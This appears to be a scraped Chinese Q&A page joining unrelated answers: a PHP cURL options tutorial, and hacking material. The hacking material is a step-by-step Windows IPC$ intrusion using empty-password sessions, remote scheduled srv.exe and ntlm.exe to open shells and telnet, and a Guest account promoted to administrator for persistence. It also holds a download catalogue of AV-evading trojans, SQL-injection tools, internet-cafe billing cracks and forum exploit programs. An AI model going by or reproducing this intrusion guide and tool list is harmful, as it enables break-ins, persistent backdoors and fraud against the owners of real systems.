導航:首頁 > 編程語言 > phpntlm

phpntlm

發布時間:2022-11-30 03:59:00

1. 跪求cmd黑客攻擊指令和cmd電腦命令!懸賞大大滴有

一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟:
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功,連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt;

下面純手打,上面是度娘給的

taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組

2. 緊急求助,關於php中curl的

cURL可以使用URL的語法模擬瀏覽器來傳輸數據,

因為它是模擬瀏覽器,因此它同樣支持多種協議,

FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE 以及 LDAP等協議都可以很好的支持,包括一些:

HTTPS認證,HTTP POST方法,HTTP PUT方法,FTP上傳,keyberos認證,HTTP上傳,代理伺服器,cookies,用戶名/密碼認證,

下載文件斷點續傳,上傳文件斷點續傳,http代理伺服器管道,甚至它還支持IPv6,scoket5代理伺服器,通過http代理伺服器上傳文件

到FTP伺服器等等。

這就是我們為什麼要使用cURL的原因!

使用cURL完成簡單的請求主要分為以下四步:

1.初始化,創建一個新cURL資源

2.設置URL和相應的選項

3.抓取URL並把它傳遞給瀏覽器

4.關閉cURL資源,並且釋放系統資源

我們來採集一個頁面,通常情況下,我們會使用file_get_contents()函數來獲取:

像這樣:

<?php

$str = file_get_contents('http://bbs.lampbrother.net');

//或者是:

$str = file("http://bbs.lampbrother.net");

//或者是:

readfile("http://bbs.lampbrother.net");

?>

這樣我們會發現,我們沒有辦法有效地進行錯誤處理,更重要的是我們沒有辦法完成一些高難度的任務:

如:處理cookies,驗證,表單提交,文件上傳等等。

好,現在我們來用代碼完成上述cURL的四步:
<?php

//1.初始化,創建一個新cURL資源

$ch = curl_init();

//2.設置URL和相應的選項

curl_setopt($ch, CURLOPT_URL, "http://www.lampbrother.net/");

curl_setopt($ch, CURLOPT_HEADER, 0);

//3.抓取URL並把它傳遞給瀏覽器

curl_exec($ch);

//4.關閉cURL資源,並且釋放系統資源

curl_close($ch);

?>

上述四步中,其中第二步最為關鍵,可以設置一些高級選項:

例如上例中的CURLOPT_URL和CURLOPT_HEADER,分別代表「需要獲取的URL地址」和「啟用時會將頭文件的信息作為數據流輸出」,這些只是冰山一角,我們還可以設置很多選項:

選項 可選value值 備注
CURLOPT_AUTOREFERER 當根據Location:重定向時,自動設置header中的Referer:信息。
CURLOPT_BINARYTRANSFER 在啟用CURLOPT_RETURNTRANSFER的時候,返回原生的(Raw)輸出。
CURLOPT_COOKIESESSION 啟用時curl會僅僅傳遞一個session cookie,忽略其他的cookie,默認狀況下cURL會將所有的cookie返回給服務端。session cookie是指那些用來判斷伺服器端的session是否有效而存在的cookie。
CURLOPT_CRLF 啟用時將Unix的換行符轉換成回車換行符。
CURLOPT_DNS_USE_GLOBAL_CACHE 啟用時會啟用一個全局的DNS緩存,此項為線程安全的,並且默認啟用。
CURLOPT_FAILONERROR 顯示HTTP狀態碼,默認行為是忽略編號小於等於400的HTTP信息。
CURLOPT_FILETIME 啟用時會嘗試修改遠程文檔中的信息。結果信息會通過curl_getinfo()函數的CURLINFO_FILETIME選項返回。 curl_getinfo().
CURLOPT_FOLLOWLOCATION 啟用時會將伺服器伺服器返回的"Location: "放在header中遞歸的返回給伺服器,使用CURLOPT_MAXREDIRS可以限定遞歸返回的數量。
CURLOPT_FORBID_REUSE 在完成交互以後強迫斷開連接,不能重用。
CURLOPT_FRESH_CONNECT 強制獲取一個新的連接,替代緩存中的連接。
CURLOPT_FTP_USE_EPRT 啟用時當FTP下載時,使用EPRT (或 LPRT)命令。設置為FALSE時禁用EPRT和LPRT,使用PORT命令 only.
CURLOPT_FTP_USE_EPSV 啟用時,在FTP傳輸過程中回復到PASV模式前首先嘗試EPSV命令。設置為FALSE時禁用EPSV命令。
CURLOPT_FTPAPPEND 啟用時追加寫入文件而不是覆蓋它。
CURLOPT_FTPASCII CURLOPT_TRANSFERTEXT的別名。
CURLOPT_FTPLISTONLY 啟用時只列出FTP目錄的名字。
CURLOPT_HEADER 啟用時會將頭文件的信息作為數據流輸出。
CURLINFO_HEADER_OUT 啟用時追蹤句柄的請求字元串。 從 PHP 5.1.3 開始可用。CURLINFO_前綴是故意的(intentional)。
CURLOPT_HTTPGET 啟用時會設置HTTP的method為GET,因為GET是默認是,所以只在被修改的情況下使用。
CURLOPT_HTTPPROXYTUNNEL 啟用時會通過HTTP代理來傳輸。
CURLOPT_MUTE 啟用時將cURL函數中所有修改過的參數恢復默認值。
CURLOPT_NETRC 在連接建立以後,訪問~/.netrc文件獲取用戶名和密碼信息連接遠程站點。
CURLOPT_NOBODY 啟用時將不對HTML中的BODY部分進行輸出。
CURLOPT_NOPROGRESS
啟用時關閉curl傳輸的進度條,此項的默認設置為啟用。

Note:
PHP自動地設置這個選項為TRUE,這個選項僅僅應當在以調試為目的時被改變。

CURLOPT_NOSIGNAL 啟用時忽略所有的curl傳遞給php進行的信號。在SAPI多線程傳輸時此項被默認啟用。 cURL 7.10時被加入。
CURLOPT_POST 啟用時會發送一個常規的POST請求,類型為:application/x-www-form-urlencoded,就像表單提交的一樣。
CURLOPT_PUT 啟用時允許HTTP發送文件,必須同時設置CURLOPT_INFILE和CURLOPT_INFILESIZE。
CURLOPT_RETURNTRANSFER 將curl_exec()獲取的信息以文件流的形式返回,而不是直接輸出。
CURLOPT_SSL_VERIFYPEER 禁用後cURL將終止從服務端進行驗證。使用CURLOPT_CAINFO選項設置證書使用CURLOPT_CAPATH選項設置證書目錄 如果CURLOPT_SSL_VERIFYPEER(默認值為2)被啟用,CURLOPT_SSL_VERIFYHOST需要被設置成TRUE否則設置為FALSE。 自cURL 7.10開始默認為TRUE。從cURL 7.10開始默認綁定安裝。
CURLOPT_TRANSFERTEXT 啟用後對FTP傳輸使用ASCII模式。對於LDAP,它檢索純文本信息而非HTML。在Windows系統上,系統不會把STDOUT設置成binary模式。
CURLOPT_UNRESTRICTED_AUTH 在使用CURLOPT_FOLLOWLOCATION產生的header中的多個locations中持續追加用戶名和密碼信息,即使域名已發生改變。
CURLOPT_UPLOAD 啟用後允許文件上傳。
CURLOPT_VERBOSE 啟用時會匯報所有的信息,存放在STDERR或指定的CURLOPT_STDERR中。

對於下面的這些option的可選參數,value應該被設置一個integer類型的值:

選項 可選value值 備注
CURLOPT_BUFFERSIZE 每次獲取的數據中讀入緩存的大小,但是不保證這個值每次都會被填滿。 在cURL 7.10中被加入。
CURLOPT_CLOSEPOLICY 不是CURLCLOSEPOLICY_LEAST_RECENTLY_USED就是CURLCLOSEPOLICY_OLDEST,還存在另外三個CURLCLOSEPOLICY_,但是cURL暫時還不支持。
CURLOPT_CONNECTTIMEOUT 在發起連接前等待的時間,如果設置為0,則無限等待。
CURLOPT_CONNECTTIMEOUT_MS 嘗試連接等待的時間,以毫秒為單位。如果設置為0,則無限等待。 在cURL 7.16.2中被加入。從PHP 5.2.3開始可用。
CURLOPT_DNS_CACHE_TIMEOUT 設置在內存中保存DNS信息的時間,默認為120秒。
CURLOPT_FTPSSLAUTH FTP驗證方式:CURLFTPAUTH_SSL (首先嘗試SSL),CURLFTPAUTH_TLS (首先嘗試TLS)或CURLFTPAUTH_DEFAULT (讓cURL自動決定)。 在cURL 7.12.2中被加入。
CURLOPT_HTTP_VERSION CURL_HTTP_VERSION_NONE (默認值,讓cURL自己判斷使用哪個版本),CURL_HTTP_VERSION_1_0 (強制使用 HTTP/1.0)或CURL_HTTP_VERSION_1_1 (強制使用 HTTP/1.1)。
CURLOPT_HTTPAUTH
使用的HTTP驗證方法,可選的值有:CURLAUTH_BASIC、CURLAUTH_DIGEST、CURLAUTH_GSSNEGOTIATE、CURLAUTH_NTLM、CURLAUTH_ANY和CURLAUTH_ANYSAFE。 可以使用|位域(或)操作符分隔多個值,cURL讓伺服器選擇一個支持最好的值。
CURLAUTH_ANY等價於CURLAUTH_BASIC | CURLAUTH_DIGEST | CURLAUTH_GSSNEGOTIATE | CURLAUTH_NTLM. CURLAUTH_ANYSAFE等價於CURLAUTH_DIGEST | CURLAUTH_GSSNEGOTIATE | CURLAUTH_NTLM.
CURLOPT_INFILESIZE 設定上傳文件的大小限制,位元組(byte)為單位。
CURLOPT_LOW_SPEED_LIMIT 當傳輸速度小於CURLOPT_LOW_SPEED_LIMIT時(bytes/sec),PHP會根據CURLOPT_LOW_SPEED_TIME來判斷是否因太慢而取消傳輸。
CURLOPT_LOW_SPEED_TIME 當傳輸速度小於CURLOPT_LOW_SPEED_LIMIT時(bytes/sec),PHP會根據CURLOPT_LOW_SPEED_TIME來判斷是否因太慢而取消傳輸。
CURLOPT_MAXCONNECTS 允許的最大連接數量,超過是會通過CURLOPT_CLOSEPOLICY決定應該停止哪些連接。
CURLOPT_MAXREDIRS 指定最多的HTTP重定向的數量,這個選項是和CURLOPT_FOLLOWLOCATION一起使用的。
CURLOPT_PORT 用來指定連接埠。(可選項)
CURLOPT_PROTOCOLS
CURLPROTO_*的位域指。如果被啟用,位域值會限定libcurl在傳輸過程中有哪些可使用的協議。這將允許你在編譯libcurl時支持眾多協議,但是限制只是用它們中被允許使用的一個子集。默認libcurl將會使用全部它支持的協議。參見CURLOPT_REDIR_PROTOCOLS. 可用的協議選項為:CURLPROTO_HTTP、CURLPROTO_HTTPS、CURLPROTO_FTP、CURLPROTO_FTPS、CURLPROTO_SCP、CURLPROTO_SFTP、CURLPROTO_TELNET、CURLPROTO_LDAP、CURLPROTO_LDAPS、CURLPROTO_DICT、CURLPROTO_FILE、CURLPROTO_TFTP、CURLPROTO_ALL 在cURL 7.19.4中被加入。
CURLOPT_PROXYAUTH HTTP代理連接的驗證方式。使用在CURLOPT_HTTPAUTH中的位域標志來設置相應選項。對於代理驗證只有CURLAUTH_BASIC和CURLAUTH_NTLM當前被支持。 在cURL 7.10.7中被加入。
CURLOPT_PROXYPORT 代理伺服器的埠。埠也可以在CURLOPT_PROXY中進行設置。
CURLOPT_PROXYTYPE 不是CURLPROXY_HTTP (默認值) 就是CURLPROXY_SOCKS5。 在cURL 7.10中被加入。
CURLOPT_REDIR_PROTOCOLS CURLPROTO_*中的位域值。如果被啟用,位域值將會限制傳輸線程在CURLOPT_FOLLOWLOCATION開啟時跟隨某個重定向時可使用的協議。這將使你對重定向時限制傳輸線程使用被允許的協議子集默認libcurl將會允許除FILE和SCP之外的全部協議。這個和7.19.4預發布版本種無條件地跟隨所有支持的協議有一些不同。關於協議常量,請參照CURLOPT_PROTOCOLS。 在cURL 7.19.4中被加入。
CURLOPT_RESUME_FROM 在恢復傳輸時傳遞一個位元組偏移量(用來斷點續傳)。
CURLOPT_SSL_VERIFYHOST 1 檢查伺服器SSL證書中是否存在一個公用名(common name)。譯者註:公用名(Common Name)一般來講就是填寫你將要申請SSL證書的域名 (domain)或子域名(sub domain)。2 檢查公用名是否存在,並且是否與提供的主機名匹配。
CURLOPT_SSLVERSION 使用的SSL版本(2 或 3)。默認情況下PHP會自己檢測這個值,盡管有些情況下需要手動地進行設置。
CURLOPT_TIMECONDITION 如果在CURLOPT_TIMEVALUE指定的某個時間以後被編輯過,則使用CURL_TIMECOND_IFMODSINCE返回頁面,如果沒有被修改過,並且CURLOPT_HEADER為true,則返回一個"304 Not Modified"的header, CURLOPT_HEADER為false,則使用CURL_TIMECOND_IFUNMODSINCE,默認值為CURL_TIMECOND_IFUNMODSINCE。
CURLOPT_TIMEOUT 設置cURL允許執行的最長秒數。
CURLOPT_TIMEOUT_MS 設置cURL允許執行的最長毫秒數。 在cURL 7.16.2中被加入。從PHP 5.2.3起可使用。
CURLOPT_TIMEVALUE 設置一個CURLOPT_TIMECONDITION使用的時間戳,在默認狀態下使用的是CURL_TIMECOND_IFMODSINCE。

對於下面的這些option的可選參數,value應該被設置一個string類型的值:

選項 可選value值 備注
CURLOPT_CAINFO 一個保存著1個或多個用來讓服務端驗證的證書的文件名。這個參數僅僅在和CURLOPT_SSL_VERIFYPEER一起使用時才有意義。 .
CURLOPT_CAPATH 一個保存著多個CA證書的目錄。這個選項是和CURLOPT_SSL_VERIFYPEER一起使用的。
CURLOPT_COOKIE 設定HTTP請求中"Cookie: "部分的內容。多個cookie用分號分隔,分號後帶一個空格(例如, "fruit=apple; colour=red")。
CURLOPT_COOKIEFILE 包含cookie數據的文件名,cookie文件的格式可以是Netscape格式,或者只是純HTTP頭部信息存入文件。
CURLOPT_COOKIEJAR 連接結束後保存cookie信息的文件。
CURLOPT_CUSTOMREQUEST
使用一個自定義的請求信息來代替"GET"或"HEAD"作為HTTP請求。這對於執行"DELETE" 或者其他更隱蔽的HTTP請求。有效值如"GET","POST","CONNECT"等等。也就是說,不要在這里輸入整個HTTP請求。例如輸入"GET /index.html HTTP/1.0 "是不正確的。

Note: 在確定伺服器支持這個自定義請求的方法前不要使用。

CURLOPT_EGDSOCKET 類似CURLOPT_RANDOM_FILE,除了一個Entropy Gathering Daemon套接字。
CURLOPT_ENCODING HTTP請求頭中"Accept-Encoding: "的值。支持的編碼有"identity","deflate"和"gzip"。如果為空字元串"",請求頭會發送所有支持的編碼類型。 在cURL 7.10中被加入。
CURLOPT_FTPPORT 這個值將被用來獲取供FTP"POST"指令所需要的IP地址。"POST"指令告訴遠程伺服器連接到我們指定的IP地址。這個字元串可以是純文本的IP地址、主機名、一個網路介面名(UNIX下)或者只是一個'-'來使用默認的IP地址。
CURLOPT_INTERFACE 網路發送介面名,可以是一個介面名、IP地址或者是一個主機名。
CURLOPT_KRB4LEVEL KRB4 (Kerberos 4) 安全級別。下面的任何值都是有效的(從低到高的順序):"clear"、"safe"、"confidential"、"private".。如果字元串和這些都不匹配,將使用"private"。這個選項設置為NULL時將禁用KRB4 安全認證。目前KRB4 安全認證只能用於FTP傳輸。
CURLOPT_POSTFIELDS 全部數據使用HTTP協議中的"POST"操作來發送。要發送文件,在文件名前面加上@前綴並使用完整路徑。這個參數可以通過urlencoded後的字元串類似'para1=val1¶2=val2&...'或使用一個以欄位名為鍵值,欄位數據為值的數組。如果value是一個數組,Content-Type頭將會被設置成multipart/form-data。
CURLOPT_PROXY HTTP代理通道。
CURLOPT_PROXYUSERPWD 一個用來連接到代理的"[username]:[password]"格式的字元串。
CURLOPT_RANDOM_FILE 一個被用來生成SSL隨機數種子的文件名。
CURLOPT_RANGE 以"X-Y"的形式,其中X和Y都是可選項獲取數據的范圍,以位元組計。HTTP傳輸線程也支持幾個這樣的重復項中間用逗號分隔如"X-Y,N-M"。
CURLOPT_REFERER 在HTTP請求頭中"Referer: "的內容。
CURLOPT_SSL_CIPHER_LIST 一個SSL的加密演算法列表。例如RC4-SHA和TLSv1都是可用的加密列表。
CURLOPT_SSLCERT 一個包含PEM格式證書的文件名。
CURLOPT_SSLCERTPASSWD 使用CURLOPT_SSLCERT證書需要的密碼。
CURLOPT_SSLCERTTYPE 證書的類型。支持的格式有"PEM" (默認值), "DER"和"ENG"。 在cURL 7.9.3中被加入。
CURLOPT_SSLENGINE 用來在CURLOPT_SSLKEY中指定的SSL私鑰的加密引擎變數。
CURLOPT_SSLENGINE_DEFAULT 用來做非對稱加密操作的變數。
CURLOPT_SSLKEY 包含SSL私鑰的文件名。
CURLOPT_SSLKEYPASSWD
在CURLOPT_SSLKEY中指定了的SSL私鑰的密碼。

Note: 由於這個選項包含了敏感的密碼信息,記得保證這個PHP腳本的安全。

CURLOPT_SSLKEYTYPE CURLOPT_SSLKEY中規定的私鑰的加密類型,支持的密鑰類型為"PEM"(默認值)、"DER"和"ENG"。
CURLOPT_URL 需要獲取的URL地址,也可以在curl_init()函數中設置。
CURLOPT_USERAGENT 在HTTP請求中包含一個"User-Agent: "頭的字元串。
CURLOPT_USERPWD 傳遞一個連接中需要的用戶名和密碼,格式為:"[username]:[password]"。

對於下面的這些option的可選參數,value應該被設置一個數組:

對於下面的這些option的可選參數,value應該被設置一個流資源 (例如使用fopen()):

對於下面的這些option的可選參數,value應該被設置為一個回調函數名:
選項 可選value值
CURLOPT_HEADERFUNCTION 設置一個回調函數,這個函數有兩個參數,第一個是cURL的資源句柄,第二個是輸出的header數據。header數據的輸出必須依賴這個函數,返回已寫入的數據大小。
CURLOPT_PASSWDFUNCTION 設置一個回調函數,有三個參數,第一個是cURL的資源句柄,第二個是一個密碼提示符,第三個參數是密碼長度允許的最大值。返回密碼的值。
CURLOPT_PROGRESSFUNCTION 設置一個回調函數,有三個參數,第一個是cURL的資源句柄,第二個是一個文件描述符資源,第三個是長度。返回包含的數據。
CURLOPT_READFUNCTION 擁有兩個參數的回調函數,第一個是參數是會話句柄,第二是HTTP響應頭信息的字元串。使用此函數,將自行處理返回的數據。返回值為數據大小,以位元組計。返回0代表EOF信號。
CURLOPT_WRITEFUNCTION 擁有兩個參數的回調函數,第一個是參數是會話句柄,第二是HTTP響應頭信息的字元串。使用此回調函數,將自行處理響應頭信息。響應頭信息是整個字元串。設置返回值為精確的已寫入字元串長度。發生錯誤時傳輸線程終止。
看到了吧,只要在第二個函數之內設置這些選項就可以完成相應的功能,cURL的功能是灰常強大滴,大家可以嘗試一下哦!

例如,我們只想把獲取到的內容輸入到文件,而不是直接輸出給瀏覽器,我們就可以使用CURLOPT_RETURNTRANSFER選項!

這樣在curl執行的時候,就會把頁面的內容輸出到文件當中,我們就可以完成採集等功能

3. PHP源碼解密

這個沒法...找找別的吧

4. 黑客常的伎倆有哪些

常用很多dos命令的 taskkill taskkill /PID 1248 /t tasklist 查進程 cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件許可權 iisreset /reboot tsshutdn /reboot /delay:1 重起伺服器 logoff 12 要使用會話 ID(例如,會話 12)從會話中注銷用戶, query user 查看當前終端用戶在線情況 要顯示有關所有會話使用的進程的信息,請鍵入:query process * 要顯示有關會話 ID 2 使用的進程的信息,請鍵入:query process /ID:2 要顯示有關伺服器 SERVER2 上所有活動會話的信息,請鍵入:query session /server:SERVER2 要顯示有關當前會話 MODEM02 的信息,請鍵入:query session MODEM02 命令列:rundll32.exe user.exe,restartwindows 功能: 系統重啟 命令列:rundll32.exe user.exe,exitwindows 功能: 關閉系統 命令列: rundll32.exe user.exe,restartwindows 功能: 強行關閉所有程式並重啟機器。 命令列: rundll32.exe user.exe,exitwindows 功能: 強行關閉所有程式並關機 一、掃描工具 X-scan 3.1 焦點出的掃描器,國內最優秀的安全掃描軟體之一!非常專業的一個掃描器! 下載 X-way 2.5 這也上一個非常不錯的掃描器哦!功能非常多!使用也不難,入侵必備工具! 下載 SuperScan 3.0 強大的TCP 埠掃描器、Ping 和域名解析器! 下載 Namp 3.5 這個就厲害了,安全界人人皆知的非常有名氣的一個掃描器!作者Fyodor 下載 Hscan v1.20 這是款運行在Win NT/2000下的漏洞掃描工具,有GUI以及命令行兩種掃描方式! 下載 SSS 俄羅斯安全界非常專業的一個安全漏洞掃描軟體! 下載 U-Scan.exe 非常好的UNICODE漏洞掃描工具! 下載 RpcScan V1.1 可以通過135埠枚舉遠程主機RPC連接信息! 下載 SHED 1.01 一個用來掃描共享漏洞的機器的工具! 下載 DSScan V1.00 ms04-011遠程緩沖區溢出漏洞掃描專用! 下載 Dotpot PortReady1.6 該軟體為「綠色軟體」,無需安裝,非常小巧(僅23KB),具有極快的掃描速度! 下載 WebDAVScan v1.0 針對WEBDAV漏洞的掃描工具! 注意:該軟體解壓縮時會被查殺! 下載 Socks Proxy Finder2 掃描埠速度非常快的一個工具,掃描完畢後還可以導出保存起來! 下載 SQLScan v1.2 猜解開著1433埠的住機密碼工具! 下載 RPC漏洞掃描器 v1.03 針對RPC漏洞掃描的工具! 下載 流光5.0 破解版 國內大名鼎鼎的黑客掃描工具,由高級程序員小榕編寫! 下載 自動攻擊探測機 Windows NT/2000 自動攻擊探測機 下載 4899空口令探測 能夠快速的掃描到被安裝了radmin服務端4899埠的空口令IP! 下載 二、遠程式控制制 黑洞2004 免殺版 藏鯨閣-陳經韜編寫的著名遠程式控制製程序!該版本還是8月15最新版的哦! 下載 冰河2004 免殺版 國內最有名,歷史最悠久的木馬冰河!本版本是冰河的最新版本,伺服器端只有16KB! 下載 灰鴿子迷你版 灰鴿子工作室-葛軍同志的作品! 下載 網路神偷 5.7 網路神偷是一個專業級的遠程文件訪問工具!具有反彈功能! 下載 廣外女生 1.53 廣州-廣外女生小組的作品,曾風靡一時! 注意:該軟體解壓縮時會被查殺! 下載 Radmin3.2影子版 非常有名的監視程序!並非木馬,所以服務端不會被查殺! 下載 黑社會 2.0 使用跟Radmin一樣,功能明顯比它多,掃描速度也非常快! 下載 風雪遠程式控制制 v3.9 基於TCP/IP協議的遠程管理網路工具,一個具有反彈功能的工具,非常小巧! 下載 無賴小子 2.5 無賴小子2.5,08月23日發布,其默認埠8011! 下載 藍色火焰 v0.5 藍色火焰是一個沒有客戶端的木馬,可謂無招勝有招!注意:該軟體解壓縮時會被查殺! 下載 網路公牛 國產公牛木馬,由於上傳文件大小限制,包中沒有加入易語言運行庫文件krnln.fnr! 下載 GoToMyPC 4.00 安裝簡單;能夠從任何安裝有瀏覽器的計算機上訪問主機;具有新的安全功能! 下載 三、入侵必備 SQL綜合利用工具 非常好的一個SQL連接器,除了可以輸入CMD命令外,還可以直接上傳軟體! 下載 SuperSQLEXEC 用來連接sql server的工具! 下載 3389.exe 開遠程機器3389埠的小東東!只要把程序上傳到肉雞運行後,重啟既可! 下載 c3389.exe 是一個可以顯示、更改本機或遠程主機終端服務埠的小程序! 下載 3389.bat 一個開3389埠的批量處理! 下載 3399終端登陸器 用來遠程登陸3389肉雞終端的工具!這個win2000以上都有,以下的都沒有! 下載 Opentelnet 遠程開telnet的工具! 下載 NTLM.exe 去除ntlm驗證的小工具,上傳後執行,然後再telnet上去既可! 下載 Hide Admin V2.0 用來隱藏肉雞上管理員帳號的工具!不過管理員帳號必須有$號哦! 下載 用的一個抓包工具,也是黑客經常使用的工具! 下載電腦-交換機-路由器 192.168.1.1~SSSO伴侶1.2 更直觀的入侵,把dos下的入侵實戰搬到圖形界面上來! 下載 3389終端復制補丁 只要安裝了該補丁,就可以直接把你需要上傳的東西拖拽到肉雞上!非常方便哦! 下載 TFTP32 非常使用的一個上傳工具!也是大家經常使用的哦! 下載 Wget.exe 命令行下的http下載軟體! 下載 Pulist.exe 使用pulist.exe 來獲取已經登陸帳戶的winlogon.exe 的PID 值! 下載 FindPass.exe 找管理員密碼,需要PULIST配合! 下載 入侵助手1.0 該工具可以將dos下的入侵命令直接生成給黑客! 下載 Snake的代理跳板 讓機器成為sock5代理軟體的程序,可以用它隱藏自己的ip. 下載 Fport.exe 命令行下查看系統進程與埠關聯! 四、注入工具 NBSI 2.0 NB聯盟小竹編寫的一個非常強悍sql注射工具! 下載 CASI 1.10 安全天使-superhei編寫的一個php注射工具,亦是國內首發的第一個php注射工具! 下載 sqlasc.exe NB聯盟出的注射點掃描工具! 下載 sql_injection 自貢學生聯盟出的sql注射工具,跟臭要飯的哪個差不多! 下載 絕世猜解SQL注射 1.0 BUGKIDZ-臭要飯的!以前編寫的sql注射工具,使用率相當廣泛!簡單實用的工具! 下載 五、網吧工具 還原轉存大師 藏鯨閣出的還原轉存大師,大家都認識!不做介紹! 下載 還原精靈清除器 CY07工作室出的一個還原精靈清除器!好久以前我用過,感覺非常不錯! 下載 還原精靈密碼讀取 還原精靈密碼讀取!讀取還原精靈密碼的工具! 下載 還原卡密碼破解程序 非常好用的還原卡密碼破解程序! 下載 Pubwin4.3 修改程序 目的:跳過管理驗證,並且可以免費上網! 下載 美萍9.0密碼破解器1.0 美萍9.0密碼破解器1.0!做破解使用! 下載 萬象2R最新版破解器 萬象2R最新版破解器!做破解使用! 下載 萬象普及版密碼破解器 可以顯示退出密碼;運行設置程序密碼;注意:該軟體解壓縮時會被查殺! 下載 網吧管理集成破解器 網吧管理集成破解器,功能挺多的哦! 下載 Pubwin精靈 程序運行後,首先點擊破解按鈕,當顯示破解成功後請點注銷按鈕.... 下載 小哨兵密碼清除器 小哨兵密碼清除,沒有測試過,大家試試! 下載 解鎖安全器2.0 解鎖安全器2.0! 下載 硬碟還原卡破解程序 硬碟還原卡破解程序! 下載 還原卡解鎖 還原卡解鎖! 下載 Bios密碼探測器 Bios密碼探測器,速度很快的哦! 下載 共享密碼掃描器 共享密碼掃描器,也是一個不錯的工具! 下載 硬碟還原卡工具包 硬碟還原卡工具包,零件很多,大家試試吧! 下載 幹掉Windows2000 幹掉Windows2000! 下載 注冊表解鎖器 注冊表破解器!解鎖用的! 下載 網上鄰居密碼破解器 網上鄰居密碼破解器,速度也很快哦! 下載 六、漏洞利用 動網7SP1,2,SQL注入 動網7SP1,7SP2,SQL版USER-AGENT注入利用程序!桂林老兵作品! 下載 動網上傳利用程序 動網上傳漏洞利用程序!桂林老兵作品! 下載 動網上傳漏洞利用 動網上傳漏洞利用程序,臭要飯的!作品! 下載 BBS3000漏洞利用工具 BBS3000漏洞利用工具,俺是奮青作品! 下載 塵緣雅境漏洞利用工具 塵緣雅境上傳漏洞利用工具,俺是奮青作品! 下載 上傳漏洞利用4in1 上傳漏洞利用程序4合1! 下載 七、嗅探監聽 nc.exe NC.EXE是一個非標準的telnet客戶端程序!安全界有名的軍刀! 下載 NetXray 一款非常好的網路分析和監控軟體 下載 Sniffer Pro 